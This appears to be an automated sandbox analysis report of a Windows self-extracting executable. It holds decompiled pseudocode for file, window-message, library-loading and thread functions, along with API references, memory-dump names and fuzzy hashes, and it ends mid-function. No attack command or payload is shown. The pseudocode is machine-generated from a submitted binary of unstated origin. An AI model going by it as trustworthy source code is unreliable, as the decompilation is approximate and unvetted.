				_t56 =  !(_t53 >> 3) & 0x00000001;
				if(_t38 != 0) {
					_t56 = _t56 | 0x00000002;
				}
				E00CC6EDB( &_a8);
				if( *((char*)(_t61 + 0x24)) != 0) {
					_t68 = _t68 | 0x00000100;
				}
				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
				_t70 = _t40;
				if(_t70 != 0xffffffff) {
					goto L15;
				} else {
					_v0.dwLowDateTime = GetLastError();
					if(E00CCBB03(_a4180,  &_a8, 0x800) == 0) {
						L16:
						if(_v0.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
						}
						L18:
						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
							_a4 = _a4 | 0xffffffff;
							SetFileTime(_t70, 0,  &_v0, 0);
						}
						 *((char*)(_t61 + 0x1c)) = 0;
						 *((intOrPtr*)(_t61 + 0x10)) = 0;
						_t30 = _t70 != 0xffffffff;
						_t57 = _t56 & 0xffffff00 | _t30;
						 *((char*)(_t61 + 0x15)) = 0;
						if(_t30 != 0) {
							 *(_t61 + 8) = _t70;
							E00CD0602(_t61 + 0x32, _a4180, 0x800);
							 *((char*)(_t61 + 0x25)) = 0;
						}
						return _t57;
					}
					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
					_t52 = GetLastError();
					if(_t52 == 2) {
						_v0.dwLowDateTime = _t52;
					}
					L15:
					if(_t70 != 0xffffffff) {
						goto L18;
					}
					goto L16;
				}
			}














                                                    0x00cc98e0
                                                    0x00cc98e5
                                                    0x00cc98eb
                                                    0x00cc98f4
                                                    0x00cc98f6
                                                    0x00cc9901
                                                    0x00cc990c
                                                    0x00cc9908
                                                    0x00cc9908
                                                    0x00cc9908
                                                    0x00cc990e
                                                    0x00cc9919
                                                    0x00cc991f
                                                    0x00cc9921
                                                    0x00cc9921
                                                    0x00cc992c
                                                    0x00cc9931
                                                    0x00cc9933
                                                    0x00cc9933
                                                    0x00cc993a
                                                    0x00cc9943
                                                    0x00cc9945
                                                    0x00cc9945
                                                    0x00cc995f
                                                    0x00cc9965
                                                    0x00cc996a
                                                    0x00000000
                                                    0x00cc996c
                                                    0x00cc9972
                                                    0x00cc998e
                                                    0x00cc99c8
                                                    0x00cc99cd
                                                    0x00cc99cf
                                                    0x00cc99cf
                                                    0x00cc99d9
                                                    0x00cc99de
                                                    0x00cc99e5
                                                    0x00cc99ee
                                                    0x00cc99f9
                                                    0x00cc99f9
                                                    0x00cc9a04
                                                    0x00cc9a07
                                                    0x00cc9a0a
                                                    0x00cc9a0a
                                                    0x00cc9a0d
                                                    0x00cc9a10
                                                    0x00cc9a21
                                                    0x00cc9a25
                                                    0x00cc9a2a
                                                    0x00cc9a2a
                                                    0x00cc9a39
                                                    0x00cc9a39
                                                    0x00cc99a8
                                                    0x00cc99aa
                                                    0x00cc99b3
                                                    0x00cc99b5
                                                    0x00cc99b5
                                                    0x00cc99c3
                                                    0x00cc99c6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc99c6

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CC7760,?,00000005,?,00000011), ref: 00CC995F
                                                    • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC996C
                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CC7760,?,00000005,?), ref: 00CC99A2
                                                    • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99AA
                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time
                                                    • String ID:
                                                    • API String ID: 1999340476-0
                                                    • Opcode ID: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                    • Instruction ID: ee3130689e0b5fdad901d7914275a5fd7f170291d3bc86b775d2090d0920129b
                                                    • Opcode Fuzzy Hash: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                    • Instruction Fuzzy Hash: 9E3121309447816FE7309F24CC4AFAABB94FB04320F200B1EF9B9961D0D7B4AA44CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1053 cdb568-cdb581 PeekMessageW 1054 cdb5bc-cdb5be 1053->1054 1055 cdb583-cdb597 GetMessageW 1053->1055 1056 cdb599-cdb5a6 IsDialogMessageW 1055->1056 1057 cdb5a8-cdb5b6 TranslateMessage DispatchMessageW 1055->1057 1056->1054 1056->1057 1057->1054
                                                    C-Code - Quality: 100%
                                                    			E00CDB568() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xd08458; // 0x10398
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                                                    0x00cdb579
                                                    0x00cdb581
                                                    0x00cdb58a
                                                    0x00cdb590
                                                    0x00cdb597
                                                    0x00cdb5a8
                                                    0x00cdb5ac
                                                    0x00cdb5b6
                                                    0x00000000
                                                    0x00cdb5b6
                                                    0x00cdb59e
                                                    0x00cdb5a6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb5a6
                                                    0x00cdb5be

                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                    • IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                    • TranslateMessage.USER32(?), ref: 00CDB5AC
                                                    • DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                    • Instruction ID: 8e9f454b720d2cbc9fec9177e16d73d356d9fc0f8cab845b38da9d1ad43bb21b
                                                    • Opcode Fuzzy Hash: 1feca4e170516ebf112a2478fc45ee8bcfd876b6b5765fa578a6209d983b58c9
                                                    • Instruction Fuzzy Hash: 35F0BD71A0121AAB8B209FE5AD4CEEB7FACEE156917004415B519D2210EB38D606CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1058 cdabab-cdabca GetClassNameW 1059 cdabcc-cdabe1 call cd1fbb 1058->1059 1060 cdabf2-cdabf4 1058->1060 1065 cdabf1 1059->1065 1066 cdabe3-cdabef FindWindowExW 1059->1066 1062 cdabff-cdac01 1060->1062 1063 cdabf6-cdabf9 SHAutoComplete 1060->1063 1063->1062 1065->1060 1066->1065
                                                    C-Code - Quality: 100%
                                                    			E00CDABAB(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00CD1FBB( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                                                    0x00cdabbb
                                                    0x00cdabc2
                                                    0x00cdabca
                                                    0x00cdabcd
                                                    0x00cdabda
                                                    0x00cdabe1
                                                    0x00cdabe9
                                                    0x00cdabef
                                                    0x00cdabef
                                                    0x00cdabf1
                                                    0x00cdabf4
                                                    0x00cdabf9
                                                    0x00000000
                                                    0x00cdabf9
                                                    0x00cdac01

                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00CDABC2
                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CDABF9
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CDABE9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                    • Instruction ID: 4382d83a25ac211aae670a6f89fd2c60ad92ecf02db42293ebbe41e5f0f513b6
                                                    • Opcode Fuzzy Hash: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                    • Instruction Fuzzy Hash: D4F0823260132877DB305B649C09FAB76AC9B46B40F484013BB05E22C0D765DB4286BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 25%
                                                    			E00CDAC16(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00CD081B(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xd23174(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xd23034( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00CDEB2C(); // executed
				 *0xd23090(0xd08438,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                                                    0x00cdac25
                                                    0x00cdac2c
                                                    0x00cdac2f
                                                    0x00cdac38
                                                    0x00cdac40
                                                    0x00cdac47
                                                    0x00cdac51
                                                    0x00cdac5c
                                                    0x00cdac60
                                                    0x00cdac63
                                                    0x00cdac66
                                                    0x00cdac70
                                                    0x00cdac7b

                                                    APIs
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                    • SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 3498096277-3360196438
                                                    • Opcode ID: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                    • Instruction ID: 7da2cd2f8d7291c42257a5a985dfd7a5bfb2157884af74b08e8ecdbf17264e48
                                                    • Opcode Fuzzy Hash: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                    • Instruction Fuzzy Hash: A4F0FFB1D00209ABCB20AFA9D9499AFFBFCEF94700F004157A555E2241DBB856069BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1071 cddbde-cddc12 call cdec50 SetEnvironmentVariableW call cd0371 1076 cddc14-cddc18 1071->1076 1077 cddc36-cddc38 1071->1077 1078 cddc21-cddc28 call cd048d 1076->1078 1081 cddc1a-cddc20 1078->1081 1082 cddc2a-cddc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                    C-Code - Quality: 65%
                                                    			E00CDDBDE(void* __eflags, WCHAR* _a4) {
				char _v8196;
				WCHAR* _t8;
				int _t11;
				WCHAR* _t13;

				E00CDEC50(0x2000);
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t8 = E00CD0371(_a4,  &_v8196, 0x1000);
				_t13 = _t8;
				if(_t13 != 0) {
					_push( *_t13 & 0x0000ffff);
					while(E00CD048D() != 0) {
						_t13 =  &(_t13[1]);
						_push( *_t13 & 0x0000ffff);
					}
					_t11 = SetEnvironmentVariableW(L"sfxpar", _t13); // executed
					return _t11;
				}
				return _t8;
			}







                                                    0x00cddbe6
                                                    0x00cddbf4
                                                    0x00cddc09
                                                    0x00cddc0e
                                                    0x00cddc12
                                                    0x00cddc17
                                                    0x00cddc21
                                                    0x00cddc1a
                                                    0x00cddc20
                                                    0x00cddc20
                                                    0x00cddc30
                                                    0x00000000
                                                    0x00cddc30
                                                    0x00cddc38

                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 1431749950-3493335439
                                                    • Opcode ID: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                    • Instruction ID: 9d80cf915c9a5441e0732f6dee2af9bf541682a27d0064f8b38db668d830626f
                                                    • Opcode Fuzzy Hash: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                    • Instruction Fuzzy Hash: 24F0EC7291422877CB202F958C06FFF7B58BF44781F044413FF8696255D6B09940D6B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1083 cc9785-cc9791 1084 cc979e-cc97b5 ReadFile 1083->1084 1085 cc9793-cc979b GetStdHandle 1083->1085 1086 cc97b7-cc97c0 call cc98bc 1084->1086 1087 cc9811 1084->1087 1085->1084 1091 cc97d9-cc97dd 1086->1091 1092 cc97c2-cc97ca 1086->1092 1089 cc9814-cc9817 1087->1089 1093 cc97ee-cc97f2 1091->1093 1094 cc97df-cc97e8 GetLastError 1091->1094 1092->1091 1095 cc97cc 1092->1095 1097 cc980c-cc980f 1093->1097 1098 cc97f4-cc97fc 1093->1098 1094->1093 1096 cc97ea-cc97ec 1094->1096 1099 cc97cd-cc97d7 call cc9785 1095->1099 1096->1089 1097->1089 1098->1097 1100 cc97fe-cc9807 GetLastError 1098->1100 1099->1089 1100->1097 1103 cc9809-cc980a 1100->1103 1103->1099
                                                    C-Code - Quality: 59%
                                                    			E00CC9785(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00CC98BC(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00CC9785(_t25);
						}
					}
				}
				return _t15;
			}







                                                    0x00cc9788
                                                    0x00cc978a
                                                    0x00cc9791
                                                    0x00cc979b
                                                    0x00cc979b
                                                    0x00cc97ad
                                                    0x00cc97b5
                                                    0x00cc9811
                                                    0x00cc97b7
                                                    0x00cc97b9
                                                    0x00cc97c0
                                                    0x00cc97d9
                                                    0x00cc97dd
                                                    0x00cc97ee
                                                    0x00cc97f2
                                                    0x00cc980c
                                                    0x00cc980c
                                                    0x00cc97fe
                                                    0x00cc97fe
                                                    0x00cc9807
                                                    0x00000000
                                                    0x00cc9809
                                                    0x00cc9809
                                                    0x00000000
                                                    0x00cc9809
                                                    0x00cc9807
                                                    0x00cc97df
                                                    0x00cc97df
                                                    0x00cc97e8
                                                    0x00000000
                                                    0x00cc97ea
                                                    0x00cc97ea
                                                    0x00cc97ea
                                                    0x00cc97e8
                                                    0x00cc97c2
                                                    0x00cc97c2
                                                    0x00cc97ca
                                                    0x00000000
                                                    0x00cc97cc
                                                    0x00cc97cc
                                                    0x00cc97cd
                                                    0x00cc97cd
                                                    0x00cc97d2
                                                    0x00cc97d2
                                                    0x00cc97ca
                                                    0x00cc97c0
                                                    0x00cc9817

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CC9795
                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CC97AD
                                                    • GetLastError.KERNEL32 ref: 00CC97DF
                                                    • GetLastError.KERNEL32 ref: 00CC97FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                    • Instruction ID: 48957f2716f86bd32fb15a278d8bb7808ebd1a2c46edab073a59170e8fca7e2c
                                                    • Opcode Fuzzy Hash: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                    • Instruction Fuzzy Hash: 2B113C31914614EBDF205F65C808F6D37B9FB42361F10892EE426C61D0DB749F44DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E00CEAD34(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xd225d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xcf73f0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x349e4b75
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                                                    0x00cead39
                                                    0x00cead3d
                                                    0x00cead44
                                                    0x00cead48
                                                    0x00cead56
                                                    0x00cead66
                                                    0x00cead6c
                                                    0x00cead70
                                                    0x00cead99
                                                    0x00cead9b
                                                    0x00cead9f
                                                    0x00ceada2
                                                    0x00ceada2
                                                    0x00ceada8
                                                    0x00ceadaa
                                                    0x00000000
                                                    0x00ceadab
                                                    0x00cead72
                                                    0x00cead7b
                                                    0x00cead8a
                                                    0x00cead7d
                                                    0x00cead80
                                                    0x00cead86
                                                    0x00cead86
                                                    0x00cead8e
                                                    0x00000000
                                                    0x00cead90
                                                    0x00cead93
                                                    0x00cead95
                                                    0x00000000
                                                    0x00cead95
                                                    0x00cead8e
                                                    0x00cead4a
                                                    0x00cead4f
                                                    0x00000000

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CE40EF,00000000,00000000,?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue), ref: 00CEAD66
                                                    • GetLastError.KERNEL32(?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000,00000364,?,00CE98B7), ref: 00CEAD72
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CEACDB,00CE40EF,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000), ref: 00CEAD80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                    • Instruction ID: edf6b42aed365bb0b5e3328558e63d95bef0eb2d7aa2d03fa4ecbbeb2834bd10
                                                    • Opcode Fuzzy Hash: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                    • Instruction Fuzzy Hash: 7601F7362012A2BFC7214B6A9C44BAB7B58EF05BA27110620F916D3550DB25EB01C6E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00CD101F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xd01098 > 0) {
					_t18 = 0xd0109c;
					do {
						_t7 = CreateThread(0, 0x10000, E00CD1160, 0xd01098, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xd01098);
							E00CC6C36(0xd01098);
							E00CC6C31(E00CC6DCB(0xd01098, _t25), 0xd01098, 0xd01098, 2);
						}
